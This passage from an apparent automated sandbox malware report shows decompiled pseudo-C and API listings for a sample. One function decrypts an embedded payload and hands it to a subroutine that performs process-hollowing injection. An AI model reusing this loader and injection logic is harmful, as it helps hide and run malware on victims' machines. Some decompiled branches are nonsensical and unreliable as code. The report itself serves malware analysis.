    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
